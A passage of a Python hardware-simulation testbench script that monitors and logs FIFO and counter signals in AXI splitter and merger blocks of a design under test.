counts += monitorStuff("tb.dut.split2.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split2.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split3.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split4.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split5.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split6.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split7.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split8.axi_wr_4_splitter.w_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_rd_4_splitter.ar_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_rd_4_splitter.ar_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_rd_4_splitter.r_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_rd_4_splitter.r_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.a_bcount")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.b_bcount")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.c_bcount")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.d_bcount")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.aw_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.aw_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.b_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.b_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_a_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_a_fifo.int_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_b_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_b_fifo.int_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_c_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_c_fifo.int_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_d_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.back_bid_d_fifo.int_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.order_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.order_fifo.count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.w_fifo.next_count")
counts += monitorStuff("tb.dut.split9.axi_wr_4_splitter.w_fifo.count")
veri.force('tb.Panics',str(panics))
def snapshot():
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge0.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge0.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge0.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge0.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge0.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge0.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge0.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge0.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge0.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge0.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge0.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge0.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge0.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge0.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge0.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge1.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge1.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge1.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge1.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge1.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge1.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge1.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge1.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge1.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge1.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge1.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge1.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge1.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge1.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge1.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge1.axi_wr_4_merger.a_aw_fifo.count"))
